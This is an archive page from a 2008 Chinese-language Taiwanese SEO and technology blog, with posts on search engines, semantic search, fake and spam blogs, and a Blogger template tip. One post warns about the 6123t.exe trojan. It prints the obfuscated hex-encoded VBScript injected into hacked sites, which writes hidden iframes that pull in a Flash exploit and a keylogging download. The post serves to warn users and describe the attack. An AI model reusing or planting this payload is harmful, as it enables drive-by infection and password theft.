2008年5月30日星期五

眼見不為真



數位技術可以把一個胖妹變成辣妹, 話不多說, 就自己看看這些影片吧 ...



















下次在網路上看到辣妹照片或看到有人在總統府裸拍, 不要太相信啦 ...

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

6123t.EXE病毒

近日瀏覽網頁時, 突然ZoneAlarm跳出一個視窗, 詢問是否執行6123t.exe? 當然當下馬上將此程式阻擋, 很難想像如果沒有防火牆的話, 不知又要造成什麼損失 ...

該檔案存在C:\目錄下

檔案名稱 : 6123t.exe
檔案大小 : 13840 byte
檔案類型 : MS-DOS executable (EXE), OS/2 or MS Windows

根據初步瞭解, 該檔案為木馬程式, 會偷取硬碟中的資料, 目前所有防毒軟體都沒有相關訊息, 似乎也都無法防堵, 現在中國大陸已經有多起中毒事件

如果您的電腦在C:\下存在6123t.exe, 而您沒有安裝額外防火牆的話, 就可能已經中毒了, 在尚未確認刪除以前, 就暫時拔掉網路線吧 ...

(追蹤報導)

已經查出來源, 該病毒似乎與此次Flash出問題有關, 並且exe檔未必都是6123t

Adobe Flash Player出現漏洞, 在Adobe釋出修補程式前,最好暫時關閉Flash外掛(或更新到最新版)

當網友瀏覽被入侵的網站時, 會執行以下javascript:

Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756
D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622
E5365744174747269627574652022636C6173736964222C2022636C7369643A424
43936433535362D363541332D313144302D393833412D303043303446433239453
336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224
1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756
D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637
56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7
377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746
52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206
865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7
7726974652028223C694672616D65207352633D6E65772E68746D2077696474683
D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090
9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7
02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222
90D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)

這段經Hex2Str後解碼就不列出了, 它會執行
flash.swf
real.htm
new.htm
help.htm

當啟動flash.swf, 會以URLMON.DLL去下載6123t.exe並執行, 執行後便會將卡巴斯基disable, 並解開ow.dll成為keyboard hook dll, 這個dll就可以監聽鍵盤的輸入, 因此該病毒應該是要偷取密碼

目前尚未中毒的電腦, 最好的方式就是先下載Adoble Flash到9.0.124版本, 並隨時注意Adobe新聞以更新flash的patch

由於被植入惡意程式的網站會越來越多, 預計災情會持續發燒

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月28日星期三

Microsoft的搜尋與多媒體技術


微軟亞洲研究院成立十週年,院長洪小文(上圖)透露了部份研究成果:搜尋與多媒體技術。目前進行的研究成果包含自動化圖片編輯、與行動定位系統搭配的圖片搜尋、以搜尋為基礎的翻譯技術、哼唱搜尋,以及自動語音合成技術等,全都與多媒體或搜尋技術相關,顯示微軟打算與Google正面交峰的企圖。

與Google Earth與街景服務競爭的圖片搜尋技術稱為Photo2Search,使用者可用手機將街道上的建築物拍攝並上傳至系統,系統便會先取得基地台的位址資料,再將附近街道圖片與使用者上傳之圖片進行比對,比對完成後,再將使用者所需的資訊,如附近地圖、觀光點、建物資訊等訊息回傳給使用者。

傳統的圖片搜尋多半是透過metadata才能進行搜尋,但Photo2Search是透過基地台的位置比對,將搜尋目標範圍縮小後,再針對圖片內容進行畫素分析。

Photo2Search顧名思義就是利用圖片來搜尋,想要知道最近出來的DVD的反應如何?是值得一看還是浪費時間?只要照個像丟上系統查詢...想要知道最近開的餐廳評語如何?也只要照個像丟上系統查詢...

Photo2Search就是要讓: a picture is worth a thousand words , 一張圖片勝過千言萬語, 讓圖片自己與系統對話!

這個技術就是要解決實際世界與數位世界的差異問題, 這項技術的前身是Content Based Image Retrieval (CBIR) - 圖片內容頡取, 但是運算時間長且不易取得同類查詢的結果, Photo2Search使用另外的方式來比對事先取得的圖片資料庫, 這個技術可以運作在圖片、聲音、影片上。

其他關於搜尋的技術研發,還有翻譯搜尋Lingo。透過比對網路上現成的多語言資料,可以更精確找出特定語詞的譯法。至於已被商品化的搜尋技術,則是哼唱搜尋(Query by Humming),藉由哼唱一段歌曲,再透過語音辨識技術來找出資料庫中吻合的曲目,該技術目前已輸出給部分手機鈴聲(ringtone)業者,並已有商業化服務。



該語音合成的發聲特徵來自建模(modeling)技術,任何人只要先花二十分鐘讓系統學習,然後就能用他的聲音唱任何歌曲、說任何話。

這樣一個系統在任何多媒體資料庫上是非常有用的,其中載有音樂的資料庫提供一個替代性和自然的方式查詢。可以廣泛使用這種系統在商業音樂產業、音樂電視台及電台、音樂商店,甚至於個人的使用上。

標籤: , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

近期語意技術探討(一)


(圖片來源:http://gridinoc.name)

2008年可以說是語意技術發燒的一年, 並且近年來不管是研究單位或是新創公司, 對於語意相關技術的重視與投資可謂不遺餘力, IEEE Intelligent Systems也在今年初刊登了不少關於語意技術的文章, 我們來看看到底語意已經發展到什麼程度 ...

語意技術對於一般使用者是感覺不到的, 您並不知道到底哪個東西應用了語意技術, 頂多您會覺得電腦好像變聰明了, 但是如果運用得不好, 您可能會覺得怎麼電腦這麼笨, 電腦的聰明與愚蠢就完全取決於到底是否正確的運用Semantic Technology(語意技術)、Artifical Intelligence(人工智慧)、Nature Language Processing(自然語言處理)、Ontology(本體論)...等等

在W3C的網站就舉了幾個語意技術的使用案例

例如其中BT(英國電訊)的案例, 根據Forrester研究顯示排名前3500的大公司, 花費在整合的費用是$6.3 million並且其中的31%花在整合外部公司, 而電信類的公司花在整合外部公司的比例高達70%

BT就將Semantic運用在SOA(Service-Oriented-Architecture)上, 讓他們的外部夥伴使用Internet與BT的B2B Gateway聯接, 輕易的自行處理作業支援相關運作, 如此一來減輕了支援成本, 也加速了作業效率

這個技術使用SOA來將整個系統分成Presentation Tier、Service Tier、Data Tier, 透過Service Tier的Semantic Broker去抓取異質系統的資料, 然後呈現在外部公司的系統上或是瀏覽軟體上, 如此一來BT本身的不同系統整合起來了, 外部公司使用各種不同系統也都可以順利的透過這個B2B Gateway來整合

在目前語意技術的運用上, 幾乎離不開Web2.0與SOA, 就其中Markup與Mashup的特性來發揮, Markup讓資料可以分析、交換(如XML、RDF、RuleML), 而Mashup可以讓服務混搭, 因此幾乎所有的技術都繞著Markup與Mashup走, Semantic/Web2.0/SOA幾乎就是Internet三位一體的趨勢

目前在歐洲的語意研究上, 以Neon-ProjectSEKTDIP為主, 各自都發展許多不同的語意技術與工具, 下次再仔細說明囉 ...



標籤: , , , , , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月23日星期五

如何在Blogger For Domain使用繼續閱讀功能

使用Blogger服務的人都有一個困擾, 那就是文章無法分成"上半段"與"下半段", 也就是無法在首頁只顯示每篇文章的上半段, 並顯示『繼續閱讀』來展開下半段, 我在網路上尋找許多解答, 大多的方式不是只適用一般的blogger(不適用blogger for domain), 不然就是需要一大堆work, 如果您想在Blogger For Domain使用繼續閱讀功能, 這裡有一個簡單得嚇人的方式...

首先在blogger的template-->Edit html中的CSS部分加入以下的code(且稱為code-1):

/*.....繼續閱讀的語法開始..........*/
<MainOrArchivePage>
span.fullpost {display:none;}
</MainOrArchivePage>
<ItemPage>
span.fullpost {display:inline;}
</ItemPage>
/*.....繼續閱讀的語法結束..........*/



然後找到<div class="post-body">
在相對應的</div>上方加上如下的code(且稱為code-2):

<MainOrArchivePage>
<a href="<$BlogItemPermalinkURL$>"><img src="您的繼續閱讀圖案路徑" border=0 alt="繼續閱讀"></a>
</MainOrArchivePage>



然後在setting-->formatting下的Post Template內輸入以下的code(且稱為code-3):

<span class="fullpost">
<span>


以後您在編寫新的文章時, code-3會自動出現在編寫內容中, 只要文章夾在span的tag內, 都會變成下半段, 而在span tag之上的內容, 就是上半段啦, 本部落格就是使用Blogger的blog for domain, 看您運作起來是否跟本部落格一樣啦!

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月22日星期四

別假了 : Flog and Splog


(圖片來源 ha.ckers.org)

啥是Flog跟Splog? 根據Wikipedia的定義: flog是指Fake blog, Splog是指Spam blog, 也就是假的部落格與垃圾部落格, 假的與垃圾部落格到底在幹什麼? 他是一個偶發的事件還是集體式的潛在犯罪呢?

Flog存在的目的是在網路散佈假的訊息, 例如:某某產品多好用, 某某餐廳的食物真好吃...等等, 主要是在網路上進行假行銷, 同樣的也會被用來打擊競爭對手, 散佈對方產品或服務不好的訊息

我就曾經在網路上看到某些餐廳利用Flog建立了許多看似由個人建置的部落格, 然後裡面穿插了許多推薦該餐廳的訊息, 結果一去消費 ... 完全不是那麼一回事

而Splog存在的目的是賺錢, 他們自己完全不生產內容, 利用複製他人部落格的內容, 然後靠頁面的Google Adsense或類似的廣告收入來營利, 有些Splog是集體式的, 如上圖的Splog hub, 有一個機制將他人部落格鎖定, 然後大量匯到Splog hub, 一堆Spamer就可以輕易的由Splog hub來拿回資料, 而營運這個Splog hub的就向這些spamer收費, 國內的Splog大多單打獨鬥, 而國外則有許多Splog hub, 在中國大陸有許多網站簡直內容一模一樣, 然後內頁有一堆會讓你誤觸的廣告, 當你仔細端詳一翻, 發現內容有些根本牛頭不對馬嘴

有時flog與splog會有混搭的情況, 例如假部落客做了一個flog, 但總不能只報自己餐廳的訊息(很快會被識破), 因此他就由別人的部落格複製了許多資料, 放在自己的部落格, 這時網友就很可能以為這個flog是真的在介紹各地餐廳, 因而就可能受騙

如何識破flog與splog的技倆呢? 有幾個原則可以使用:

(1)如果網頁內廣告的部分與內容不成比例(廣告部分遠大於內容), 並且你必須很仔細找才能分辨廣告與內容, 這個頁面就很可能是splog

(2)如果部落格屬於介紹產品或服務, 其文章不讓使用者留言, 並許多文章與其他部落格相同, 或這個部落格的文章日期集中度很高(也就是都集中在某幾天刊登, 但某些部落格可以改日期就不適用), 這個頁面就很可能是flog

除了部落格有flog/splog, 許多提供web2.0的大站台也是散佈假訊息的集中地, 許多提供刊登照片的網站也是假自拍一堆, 這也許真的部分應驗了"你在看誰的部落格"一書所說的現象

處於假資料一堆的網路世界, 最好的方式就是提高自己的辨識能力, 否則被賣了都還不知道...

標籤: , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

搜尋引擎的運作背後



相信大部分人都不太清楚到底搜尋引擎如何運作, 就算是SEO專家或是技術高手, 對於Google的PageRank也都只能由觀察來推論實際運作的可能性, 現在我們就幾個關鍵人物的說法來探究 ...

近日Google的官方部落格刊登了Udi Manber(VP Engineering, Search Quality)的這篇文章: Introduction to Google Search Quality, 並且透露Google將定期公告關於搜尋引擎的訊息

Udi Manber在2006年前是負責Amazon的A9搜尋引擎, 因此雖然只加入Google兩年, 但是已經算是搜尋引擎的老鳥了

在談Udi Manber的文章前, 我們先來看Blekko的Rich Skrenta, 他敘述關於search engine:

Step 1 is to copy the internet onto your cluster. Step 2 is to analyze it..

Search is like 7 hard problems wrapped into a stack. Distributed systems, html analytics, text analytics/semantics, anti-spam, AI/ML, frontend/UI. And scale...

Plus there is always something fresh and new every day mining through the vast sordidness of the many billions of pages on the web. You expect to be amazed at the endless varieties of crazy porn domains and new approaches to webspam.

Rich Skrenta說到, 搜尋引擎就是把全球的頁面複製一份到你的叢集裡, 然後進行七項苦工(分散式系統,HTML分析,文字與語意分析,反垃圾,人工智慧與機器學習,使用界面,彈性的系統規模)...然後每天都會驚訝發現許多的色情與垃圾網站...(僅就意思翻譯,請多包涵)

他的最後一句透露了兩個重點...取巧的網頁會被抓出來,以及人類在整個過程中會介入資料的判斷

其實從上次Google的PR調整來處罰Paid link, 大概就清楚人為干擾search engine algorithm的例子 ,但由Rich Skrenta的說法就更明白, 非自然的網頁行為是被嚴密的監控的, 也許您會認為上億頁的資料中不會被發現, 那您就低估了人工智慧與機器學習的可能性 ...

SitePro列出的SEO十大守則

Commandment 1: There are No Rank Guarantees
Commandment 2: Ranking is Not the End, It's the Means
Commandment 3: Know Your Competition
Commandment 4: Use Search Engine Friendly Design
Commandment 5: Select Keywords that are Worthy
Commandment 6: Write Great Content
Commandment 7: Use Good Hyper Linking Strategy
Commandment 8: Write Relevant and Original Meta Content
Commandment 9: Acquire Relevant Links
Commandment 10: Consult Experts, If You Need To


也可以很清楚的知道: 好好耕耘內容, 不需要太在意評分, 自然可以呈現好結果

我們現在再回來看看Udi的文章 ...

PageRank is still in use today, but it is now a part of a much larger system. Other parts include language models (the ability to handle phrases, synonyms, diacritics, spelling mistakes, and so on), query models (it's not just the language, it's how people use it today), time models (some queries are best answered with a 30-minutes old page, and some are better answered with a page that stood the test of time), and personalized models (not all people want the same thing).

顯示PageRank只是"Part-of", 由許多觀察也發現, PR與SERP不如以前關係緊密, 因此許多追求PageRank的作法應該有所調整, 並且以後可能搜尋結果可能會因人而異(您看到自己頁面的搜尋結果很好,不要太高興啦...)

In 2007, we launched more than 450 new improvements, about 9 per week on the average...we made significant changes to the PageRank algorithm in January.

去年Google就進行了450次以上的調整, 並於2008.01做了PageRank algorithm重大調整, 跟一些專家所說的數字差距真的太遠啦

There is a whole team that concentrates on fighting webspam and other types of abuse. That team works on variety of issues from hidden text to off-topic pages stuffed with gibberish keywords, plus many other schemes that people use in an attempt to rank higher in our search results. The team spots new spam trends and works to counter those trends in scalable ways; like all other teams, they do it internationally.

如Rich Skrenta所說的, Udi也提到非自然的取巧作法是被嚴格觀察的...尤其當您在網頁上看到某些取巧的作法時, 就趕緊停止吧, 因為Gooogle早晚也會知道的...

我們就密切注意Udi Manber後續的文章吧, 如果您懶得看英文, 隨時回來這裡交流吧 ...

標籤: , , , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月21日星期三

Blekko:下一個Google?



如果跟您說Blekko這家公司創於2007年六月, 並且已經募集了數百萬美金, 而他的網站在這裡, 不知您做何感想?

但是如果再跟您說, 他的創辦人是Rich Skrenta:撰寫第電腦病毒Elk ClonerDMOZ ODP創辦人之一、Topix線上新聞創辦人之一, 並且他的夥伴是早期Google的人David DesJardinsJeremy Wenokur(Jeremy也是ODP的早期創辦人之一), 大概您就不會那麼驚訝了

不過一堆有頭有臉的人搞出一個Blekko這樣的公司, 到底葫蘆裡是賣什麼藥呢?

據Skrenta表示, Blekko主力在indexing,query serving的後端, 將會讓使用者有全然不同的搜尋經驗, 但是真正宣佈prototype應該不會早於2009年, 因此可以預知2009年後以Google PageRank為主的SEO會有一個不小的改變

也許您會說:幾個人加上幾百萬美金, 可能憾動Google在搜尋上的地位嗎? 如果您仔細瞭解他們在Google、DMOZ上扮演的角色, 也許您就不會太懷疑Skrenta所說的

除了Blekko之外, 還有TwinePowersetFreebaseKartooizitoujikohakia ... 緊追其後, 2008年到2009年之間, 搜尋引擎還有一場大戰, Sit back & Enjoy it !

標籤: , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月20日星期二

Wire-free 無線的科技生活


(Powermat wire-free device 請點圖看影片)

筆者在2003年曾經報導過MobileWise的Wire-free device, 當時這個產品的出現真的令人驚豔, 終於可以擺脫3C產品那麼多規格的充電器, 但是幾年過後MobileWise突然消聲匿跡, 當時另外一家Splashpower也同樣莫名其妙的消失, 到底發生了什麼事呢?

根據WildCharge的Matzkevich(當時MobileWise的Marketing VP)說, 當時的製造成本與現在差異太大了, 因此當時的製造技術根本無法生存, 這裡有WildCharge在CES上的影片

除了WildCharge外, 同樣是Wire-free的供電設備還有PowerCast, eCoupledPowermat,這裡有關於PowerCast的介紹eCoupled的介紹

不管是Powermat, PowerCast, Wildcharge, 或是eCoupled, 都是無線式的電源設備, 提供給lower-power device, 如3C產品/電視/電燈/玩具...等

Powermat使用的是Powermat’s surface connect technology™ (SCT)專利技術, PowerCast使用的是Powercaster™ transmitter chip與Powerharvester™ receiver chip, 透過RF(Radio Frequency)來傳送訊號與充電, WildCharge則與Powermat的技術及應用比較類似, eCoupled則與PowerCast的技術及應用比較類似

有興趣的讀者, 可以看CES 2007CES 2008詳細內容

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月15日星期四

語意搜尋的前哨站 : 垂直搜尋


Google的一般搜尋後又推出各類搜尋之際(圖書搜尋, 地圖搜尋, 學術搜尋, 網誌搜尋, 產品搜尋, 新聞搜尋...等), 各家一堆特定目的垂直搜尋也紛紛想要搶下一片江山, 這些搜尋引擎到底存活的機率有多少? 功能如何?

目前廣泛性的搜尋除了Google外, 大抵普遍被使用的就是Yahoo/Microsoft/A9/AltaVista/AllTheWeb/Lycos/Ask.com/Baidu...等等, 在這些廣泛性搜尋引擎與語意搜尋引擎(如Kartoo/izito/ujiko/hakia...等)之間, 垂直搜尋引擎的出現也彌補了目前搜尋不精準的缺點。

以下就來介紹一些功能不差的垂直搜尋及特殊查詢網站...

(1)(垂直搜尋)Kooxoo酷訊網 : 提供中國大陸的工作、房屋、票務、酒店、旅遊、購物等生活內容的搜索服務。這個酷訊網由北京大學計算機工程背景的陳華所創辦, 可以搜尋到的訊息可以說幾乎涵蓋了中國大陸的食衣住行娛樂, 由於表現不凡, 也獲得了Qihoo不少資金的投資。

(2)(垂直搜尋)Jobui/Jobmet : 為求職者提供大量的工作訊息,及中高端人才獵頭服務。這類服務與台灣的104人力銀行不同, 他們沒有自己的資料, 只是提供界面去各人力資源網站抓取資料加以整合。

(3)(垂直搜尋)Krillion產品搜尋 : 這個查詢與Froogle類似, 但資料量不夠多, 面對Google大概存活率不高, 除非資料能夠往精緻化發展。

(4)(垂直搜尋)Spock找人服務 : 這個找人服務與USA People Search類似。

(5)(垂直搜尋)Yoinkd音樂搜尋 : 與百度的MP3搜尋類似, 精準度不錯, 而且資料量也不差。

(6)(特殊查詢)Openrice餐廳搜尋 : 可以搜尋香港各類餐廳, 但不算是垂直搜尋, 因為資料蠻齊全的, 因此也把他列進來。

(7)(整合界面搜尋)oskope視覺搜尋 : 提供搜尋eBay/Amazon/flickr/Fotolia/Yahoo/YouTube等內容的視覺化搜尋, 其功能與Spacetime類似, oskope需要安裝額外的plug-in, 而Spacetime需要安裝額外的軟體, 並且硬體需求也較高。

(8)(垂直搜尋)FindBook翻書客 : 提供各網路書店的書籍比價搜尋, 類似的服務有isoshu, 但是isoshu找的不是書籍的價格, 竟然找的是書的內文, 不知他是如何處理版權問題。

(9)(垂直搜尋)Yousee BBS搜尋 : 提供BBS站內的文章搜尋, 是政治大學資科系團隊製作出來的。

在網路上資料日增的情況下, 各種需求已經無法以單一普遍性搜尋引擎來滿足, 因此專門領域搜尋、垂直搜尋、語意搜尋等需求會越來越高, 並且更符合人性化的界面也是大家所期盼的, 以上這麼多的搜尋網站到底誰能勝出? 還是只是曇花一現? 就看使用者賞不賞臉了!

標籤: , , , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月14日星期三

搜尋引擎的下一步:語意搜尋

現在的搜尋引擎雖然精準度已經比以往提高不少, 但是還是常常搜非所尋, 想要找亞馬遜叢林的資料, 輸入Amazon卻都是亞馬遜書店相關訊息, 必須翻到好幾頁以後才陸續出現亞馬遜叢林的資料

因為亞馬遜書店的PageRank值高, 因為亞馬遜書店的流量大, 所以搜尋引擎就以最可能你需要的出現在最前面, 但是偶爾(或是常常?)你要的資料並非最熱門的, 你就得耐心的多翻幾頁, 或者多使用不同的搜尋引擎來找尋 ...

但是, 這種現象已經慢慢在改觀中, 因為許多語意相關的技術已經逐漸純熟 ...



如上面畫面的izito, 當你輸入關鍵字以後, 右邊會出現Topic與domain選項, 當你輸入amazon後, 就可以選擇river或books等選項來確認你所謂的amazon是啥意思, 但是不幸的是...雖然izito可以搜尋中文, 但是對於資料的分類(也就是ontology的建立), 尚無法精確的處理中文網頁, 你如果輸入"五佰", izito自做聰明的分類還是會讓你滿臉豆花 ...

而如下圖顯示的ujiko雖然不允許處理中文資料, 但是允許使用者對搜尋結果做客製化(如搜尋到的結果給他一顆心, 或丟到垃圾桶), 下次搜尋就會以你客製的結果出現, 並且ujiko也提供跟izito類似的topic分類, 並且可以往下再分子類別, 雖然介面稍微複雜些, 但搜尋結果還算不錯



而如下所顯示的kartoo就更厲害啦, 當滑鼠移動到某個link時, 便會顯示這個link在ontology中的關係, 同樣的他的左邊選單也提供topic的選項, 不過kartoo也不支援中文搜尋



當然Semantic Search Engine還不只這些, 下次再來談多些相關網站及這些語意搜尋的技術層面內容 ...

標籤: , , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

Tron Guy and Leslie Hall


(請點圖看影片)

在這裡要介紹兩個其貌不揚的人物: Tron Guy及Leslie Hall, 一個是歐吉桑, 一個是歐巴桑, 這兩個人都是因為Web而竄紅, 因為Web而讓他們的一生變得不一樣。

這位Tron Guy本來從事電腦業, 是一個電腦顧問, 拜YouTube以及ROFLCon所賜, 讓他一夕成名, 也讓廣大的網民娛樂一番。

Tron Guy的招牌就是他一身看似星戰電影的服裝, 上面還有發亮的螢光, 拜訪過他的網站後, 發現老外真的是很有研究精神, 他還把自製Tron Guy的服裝心得煞有介事的很仔細的介紹, 把他肥碩的身材一點也不吝惜的秀給大家參觀, 不過大概不會有人真的去做這樣的衣服吧!這裡有Tron Guy在脫口秀的訪問介紹影片。

Leslie Hall更是不得了, 還推出各式產品, CNN還特別有報導 ... 看她的架勢還頗有歐普拉(Oprah Winfrey)的影子。

從這兩個老年人(應該不算過份吧...)的故事, 可以看到他們透過網路上的各種技術來進行發聲與行銷, 真的有兩把刷子的話, 也許從此平步青雲, 沒有料的話也至少出來玩耍喇一喇。

這類人物未必是全球或全美知名人物, 但是透過網路小眾媒體讓少數觀眾看到, 進而引起傳統媒體的注意, 也許最後可以晉升為真正的知名人物。

標籤: , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月13日星期二

CheckFree讓您線上存支票


(圖片來源: CheckFree.com)

CheckFree Corp.推出線上銀行服務, 讓您在線上把支票掃瞄檔案上傳, 就可以存到自己的帳戶裡頭, 免除了跑銀行的麻煩, 這個被稱為Remote Deposit Capture的技術其實已經推出多年, 現在CheckFree Corp.打算推展到一般的消費者 ...

CheckFree Corp.的副總Rod Springhetti說, 這個服務以後將會是線上銀行的基本功能, 目前只要您所屬行庫使用CheckFree的服務, 都能讓消費者體驗這個方便的線上支票服務。

Celent的分析家認為, 雖然這個服務將會是線上銀行及行動銀行的趨勢, 但目前會有多少銀行採用CheckFree服務, 或者消費者的反應如何都未可知, 根據Celent的調查, 20%的銀行可能願意採用, 另外20%的銀行願意考慮, 但高達90%的銀行願意針對公司行號推出這個服務。

目前推出這個服務, 對消費者而言應該是一個方便的事情, 因為大多家裡都具備上網設備及含有掃瞄器功能的印表機, 因此這個服務如果能夠在安全上把關, 讓芭樂票無法兌現的話, 也許台灣在不久將來也能夠享受這麼便利的服務。

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月7日星期三

勞力密集的高科技網路業


(圖片來源:http://www.explorepahistory.com/)

照理說高科技主要目的是在節省人力,讓需要人力的作業透過科技來快速處理,但是在層層環節還無法暢通的情況下,你所認為的高科技背後,可能就像上圖一樣 ... 看似一切自動化的假像下,其實後面是一堆人在揮汗作業著 ...

你認為在YouTube、無名影音等網路影音服務,是誰在監看哪些內容是不合規定的?

你認為酷訊網站翻書客等垂直整合查詢的資料是怎麼來的?

你認為SEO(Search Engine Optimization)廠商用什麼方式讓你的網站提高搜尋出現機率的?

答案揭曉...

YouTube、無名影音等網路影音服務,除了靠使用者檢舉之外,是靠人去監看哪些內容是不合規定,然後予以刪除。當資料量越來越大時,不是陷入無法控制的局面就是必須投入更多的人力。

垂直整合查詢的服務必須事先以Information retrieval的技術,分析取得資料的HTML TAG來確認抓取資料的格式,這當然就必須人力介入以提高準確度,但是當抓取資料的對方修改網站結構,所有資料就亂了譜了,所以當資料結構變更頻繁時,勢必投入更多的人力來修正。

而SEO就更是勞力密集了,雖說有一堆SEO軟體的協助,但是SEO軟體分析結果還是必須由人來決定哪些要修改?要採取哪些動作?然後背後一堆人來登錄網路目錄,並且大多再靠人力來監看結果。

為啥這麼累? 因為許多技術還不純熟,因為資料的互通還卡在許多關卡,因為只有人來作判斷才能確保最後結果。

哪些技術還不純熟? 影音內容與文字內容的語意技術,目前還無法讓電腦正確自動判讀影音內容或文字的語意,大多市面上的技術都還無法保證百分之百的準確。而資料互通雖然有XML與Web Services的技術,但是對方不開放的情況下,仍舊無法達到自動互通的結果。

想像一下,你用滑鼠一點,有這麼多的內容讓你免費取用,但是其背後正躲著一群人努力忙碌的產生較正確的資料,這個畫面是有些滑稽,如果資料量越來越多,整個勞力密集的高科技網路業會怎樣呢?

標籤: , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

當Real Player可以下載網路影音檔案 ...


Real Player新版免費下載軟體於2007年推出,他可以在網路上觀看YouTube等線上影音時下載非DRM(Digital Rights Management)保護的各類網路影音檔案,並且內建燒錄軟體可以把下載的檔案,方便的燒錄成CD或DVD。這個功能確實造福了廣大的使用者,但是卻也引發了一場一觸即發的戰爭 ...

Real Player提供的這個功能雖然不算創新,原本就有許多軟體或技巧可以將網路影音下載,但是總需要額外的安裝或步驟,但是現在連電腦白癡都可以一個按鍵把所有檔案搬回家,這個功能可能造成的問題,想起來就有些可怕 ...

到底哪裡可怕?

原本在網路分享的影音檔案,只是希望使用者透過網路平台來觀看,但是現在使用者可能下載後重新製作與燒錄,造成了Copy Rights更多的問題。原本透過網路平台以帳號密碼來觀看的公播版,如果沒有DRM機制,已經完全沒有保障了。

並且此舉,對於提供網路影音平台的業者,如YouTube、I'm TV、無名影音...等等,也會造成不小的衝擊,會造成廣告效益降低以及網路平台更加繁忙。

以往使用者在使用YouTube,可能一一的觀看各個網路影片,多少都會停留在頁面,而頁面上的廣告也才會有曝光度,但現在使用如果使用Real Player下載影片,他可以快速瀏覽了數十個影片,但都不在頁面觀看,等待下載完成後才在Real Player界面上觀看,此舉就造成了YouTube的流量提高了,但卻使得廣告效益降低了...

雖然Real Player的這項貼心功能實在讓使用者稱讚,但卻也帶來了更多著作權與版權的問題,並且是否會在網路影音平台造成風暴呢? 持續觀察才能知道了!

標籤: , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月5日星期一

你在看誰的部落格? 一個目前沒有答案的問題


許多網路業界的人對於Andrew Keen的這本書嗤之以鼻, 認為Andrew Keen這一位失意的網路創業家只是在無病呻吟, 網路的現象輪不到他來下總結...

其實看這本書, 不是要來看他說的結論對不對, 而是透過他的觀察, 來思考您自己認為的結論是什麼 ...

我的標題寫著: 你在看誰的部落格? 一個目前沒有答案的問題

為什麼目前沒有答案? 因為結果如何大家都不知道! 除非您像Andrew Keen斷言說: Web 2.0是一個文化浩劫, 或是您斷言說: Web 2.0會讓文化更上一層樓 ...

當然這些說法, 都是瞎說, 還沒到最後一刻, 誰知道結局如何? 除非您是上帝!

那討論一個目前沒有答案的問題, 不是沒事找事, 無聊至極嗎? 幹啥去看Andrew Keen一派胡言?

就好像地球溫室效應, 高爾所說"不願面對的真相", 到底溫室效應是否人類造成的? 還是只是一個包裝精美的政治謊言? 當然目前大部分都認為溫室效應來自於人類濫用自然資源而來, 但是 ... 誰能十足十把握? 不過就算"不願面對的真相"是一個世紀謊言, 反正愛惜自然資源, 不要製造汙染總是好事, 到底是真相還是謊言就沒那麼重要了

因此看這本書, 不是要來看他說的結論對不對, 而是透過他的觀察, 來思考您自己認為的結論是什麼, 觀察Andrew Keen所說的現象有哪些是有可能發生? (哪些現象呢? 後續文章再一一探討)

可能發生的問題, 如果您能創造一個機制來解決, 那恭喜您! 繼Google,YouTube後, 您可能是下一個科技新貴

如果您無法創造一個機制來解決, 那至少不要成為災難的加速者

例如, 不要成為Web 2.0謠言的散播者或製造者

例如, 不要因為一時的方便而忘記了著作權

例如, 如果大家都能清楚的辨認網路上的錯誤訊息或詐騙內容, 也許這些錯誤訊息與詐騙內容會逐漸減少 (如果Spam Mail不再有效, 自然會慢慢消失, 如果詐財的色情內容招不到客人, 也自然會慢慢消失 ... )

Andrew Keen的書是否無病呻吟, 這篇文章是否也是爛文一枚, 也是由大家來決定

Web 2.0就是這麼可愛 (民主萬歲), 但也就是這麼可怕 (無知鄉民的假民主), 到底是可愛還是可怕, 就看大部分的閱聽者的素質來決定啦 ...

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

由業餘教派旁觀現在的專業人士


(圖片摘自電影:料理鼠王Ratatouille)
不管您是否看過《料理鼠王》這部電影, 您一定對於老鼠可以當廚師這件事情嗤之以鼻, 老鼠這麼骯髒, 廚師的專業怎麼可能由一隻老鼠來擔任? 並且廚房最怕的就是有老鼠, 一群老鼠佔據的廚房 ... 簡直無法想像誰還能吃得下飯?

如果您有以上的想法, 那您對實際的專業, 顯然還有一段差距 ...

《料理鼠王》這部電影敘述一隻與眾不同, 並且對於美食有獨特敏銳感覺的老鼠, 奮發向上成為一個專業廚師的過程 (以人的觀點來看, 老鼠還能奮發向上是一件令人噴飯的事情), 其實這與在Web 2.0的網路上, 業餘教派被所謂的專業人士所歧視有何不同?

